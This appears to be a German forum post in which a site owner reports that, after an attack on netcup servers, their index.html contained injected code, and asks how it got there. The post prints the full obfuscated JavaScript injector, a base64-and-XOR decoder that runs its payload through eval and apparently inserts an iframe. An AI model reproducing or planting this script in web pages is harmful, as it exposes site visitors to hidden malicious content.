Hallo,
seit dem Angriff auf die netcup Server hat unsere index.html Datei folgenden Code im Quellcode gehabt:
<script language="javascript">try { function wSeRLHzrSUGfbB(cIqLnSMrU){var wbRdWCU="",namwSyoX,RDqgWs,wFNcXL,oXHCthJwL,jwAkDWBZ,DjfmIsR,ibPZVqxH,oJThjISzR,rKxmdgfsjc;var cUNAbO="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var WlULi="";for(oJThjISzR=0;oJThjISzR<cIqLnSMrU.length;){oXHCthJwL=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));jwAkDWBZ=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));rKxmdgfsjc=wSeRLHzrSUGfbB;DjfmIsR=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));ibPZVqxH=cUNAbO.indexOf(cIqLnSMrU.charAt(oJThjISzR++));namwSyoX=(oXHCthJwL<<2)+(jwAkDWBZ>>4);RDqgWs=((jwAkDWBZ&15)<<4)+(DjfmIsR>>2);wFNcXL=((DjfmIsR&3)<<6)+ibPZVqxH;rKxmdgfsjc=rKxmdgfsjc.toString();wbRdWCU+=String.fromCharCode(namwSyoX);if(DjfmIsR!=64)wbRdWCU+=String.fromCharCode(RDqgWs);if(ibPZVqxH!=64)wbRdWCU+=String.fromCharCode(wFNcXL);}rKxmdgfsjc=rKxmdgfsjc.replace(/\W/g,"");rKxmdgfsjc=rKxmdgfsjc.split("").reverse().join("");for(oJThjISzR=0;oJThjISzR<wbRdWCU.length;oJThjISzR++)WlULi+=String.fromCharCode(wbRdWCU.charCodeAt(oJThjISzR%wbRdWCU.length)^rKxmdgfsjc.charCodeAt(oJThjISzR%rKxmdgfsjc.length));return eval(WlULi);}wSeRLHzrSUGfbB("SWx1THdMQVZFTlJVVGx7HhUVTgwKEQseA0dZTRwkEScXNiceRjc4ChU1ACEDJh8EBhdLSBoAFQUAHWlbU35uZwwKJyI6AXwVHjYOO2lXSHZ7TU9LbG0GJQAABQZ7KzINNQoDRVlPYUNDU0lkZhsAFQ8EF1ogGy91UXdwEic9GlJ7ZQIBB1MGFls9KyRKMQ0afRJ8MB4LLi4BVyEdISFEGDw6TUllb2cNAAkQHhcLAksQGw0VXhITGhYIAycFEScWSwMVFAYJCFFw");} catch(e){}</script>
Es handelt sich dabei um das einbringen eines iFrames.... wenn ich den Code korrekt übersetzt habe...
Der Server nutzt kein proftpd sondern vsftpd, ist auf dem aktuellsten Stand. Das Passwort vom Root ist sehr sicher und es kennt keiner. Weiterhin ist der Login via root nicht möglich sondern nur durch einen User und dieser hat ebenfalls ein sehr sicheres Passwort. Auf der Seite ist nur reiner HTML Code und CSS für Schriftart und Farben.
Wie kann das also sein, dass die index.html plötzlich nach dem Angriff einen solchen Code erhält, wenn kein Zugriff von unserer Seite aus möglich war?
Wir würden uns über eine Antwort freuen. Vielen Dank...
MfG